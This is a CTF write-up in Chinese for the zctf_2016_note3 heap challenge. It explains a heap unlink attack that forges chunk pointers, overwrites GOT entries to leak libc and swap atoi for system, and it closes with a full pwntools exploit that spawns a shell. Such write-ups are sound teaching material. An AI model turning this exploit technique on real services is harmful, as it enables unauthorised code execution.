zctf_2016_note3

这道题函数较多，但是相对来说还是一般的堆题，函数多可一多理解，下面开始一一讲解。

先看add函数

第十二行的size函数，是用来输入我们要申请大小的堆，点进去看有点复杂，但其实和scanf差不多，里面还有个sub_4008dd的函数，再点进去

sub_4008dd函数，这个相当于read函数，在下面的好几个函数都调用到，先看函数的参数第三个参数 char a3，其值是10，第一个参数a1是输入的地址，第二个是输入的size，一个个输入保存在v7中但是最长不会超过32的长度，遇到’\x00’时结束，这里的a3=10其实就是截止符’\xa’，后面两条已经不重要了。

最后返回的是我们输入的第十二行size的值。第十九行的sub_4008dd函数也是同理，不过输入的长度有size决定。外面的sub_400a30函数里的nptr是在bss段上的地址，存放的是malloc的地址，第一个存放地址，第二个加八的地址存放size

edit函数，先看第16行的read函数，第一个参数 *(&ptr + v3)其实就是存在堆上的地址，v3指的第几个堆，第二个参数，就是bss存堆地址再加8的地址，存放的是malloc的大小，和原来的一样，所以不存在堆溢出的情况。

dele函数，bss段上的地址清零，堆上的内容也被释放了，所以并不存在UAF漏洞

重点的地方在这，就是unlink的怎么构造。

先构造四个个堆块，其中第一个堆堆0的fd和bk指针分别放fd=ptr-0x18和bk=ptr-0x10，后期会进行和并

ptr=0x6020c8
fd=ptr-0x18
bk=ptr-0x10
payload1=p64(0)+p64(0xb1)+p64(fd)+p64(bk)

add(0x90,payload1) #堆0
add(0,'bbbb')      #堆1
add(0x90,'CCCC')   #堆2
add(0x10,'dddd')   #堆3 
dele(1)

关于第二个堆块，我们申请的是0的大小，但是ptmalloc会最少申请0x10,后期edit的时候是可以溢出的，从而覆盖掉堆指针。这里会有个问题就是为什么不在第一次malloc堆1的时候写入payload2，因为第一次的话事溢出不到堆2

payload2=p64(0)*2+p64(0xb0)+p64(0xa0)

add(0,payload2)

覆盖后的堆块是长这样的，把第堆2的大小和它的previous in use位改成了0,也就是上一个堆堆1没有使用

当删掉堆2的时候，它会检查堆1的两个指针，是满足条件的，其中的0xbbb018这个地址存放size的大小是包括到0xbbb0b0这里的（猜想），而0xbbb0c0这里的大小是previous size ,0xbbb0c8这里表示上一个堆没有使用。

当把堆2delete时，这几个堆就会进行合并dele之前，bss段上存放堆指针是这样的布局。

而在dele(2)后

存放堆2的指针被置零了

这是堆合并后的样子，应该是堆1和堆2是没有被利用的然后和堆0合并了

0x151也就是中间0xbbb0c0这里的大小相加但是堆2这里的内存没有释放

之后的bin是这样的

然后就可以从0x6020b0这个位置实行修改堆指针从而对got表的改写

payload3 = p64(0) * 2 + p64(elf.got['free']) * 2 + p64(elf.got['atoi']) + p64(0) + p64(elf.got['atoi'])

edit(0,payload3)

再把edit堆0,也就是edit0x602018（free_got)地址的内容改写成(0x400730)puts_plt

edit(0,p64(0X400730)[:-1]) #puts_plt

这样再dele堆1的时候也就是free 0x6020d0这个地址，也就是puts(elf.got[‘atoi’]),从而获得atoi的got项的内容，从而可以算出libc的偏移

atoi_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('atoi_addr = ' + hex(atoi_addr))

然后再edit堆3，也就是0x6020e0这个地址，更改atoi的got表的地址为sytem，再从开始时候菜单有个atoi函数然后写入的内容为‘/bin/sh’就可以提权了。

最后的exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./zctf_2016_note3")
elf=ELF('./zctf_2016_note3')
libc=ELF('./libc-2.23.so')
context.log_level="debug"

def add(size,content):
    p.sendlineafter('option--->>','1')
    p.sendlineafter('Input the length of the note content:(less than 1024)',str(size))
    p.sendlineafter('Input the note content:',content)

def edit(index,content):
    p.sendlineafter('option--->>','3')
    p.sendlineafter('Input the id of the note:',str(index))
    p.sendlineafter('Input the new content:',content)

def dele(index):
    p.sendlineafter('option--->>','4')
    p.sendlineafter('Input the id of the note:',str(index))

ptr=0x6020c8
fd=ptr-0x18
bk=ptr-0x10
payload1=p64(0)+p64(0xb1)+p64(fd)+p64(bk)

add(0x90,payload1)
add(0,'bbbb')
add(0x90,'CCCC')
add(0x10,'dddd')
dele(1)

payload2=p64(0)*2+p64(0xb0)+p64(0xa0)

add(0,payload2) 

dele(2)  #he bing

payload3 = p64(0) * 2 + p64(elf.got['free']) * 2 + p64(elf.got['atoi']) + p64(0) + p64(elf.got['atoi'])

edit(0,payload3)

edit(0,p64(0X400730)[:-1]) #puts_plt

dele(1)  #dele di 0 ge dui 

atoi_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('atoi_addr = ' + hex(atoi_addr))
#gdb.attach(p)
sleep(1)

base=atoi_addr-libc.sym['atoi']
system=base+libc.sym['system']
edit(3,p64(system))

p.sendline('/bin/sh')
#p.sendline(payload)

p.interactive()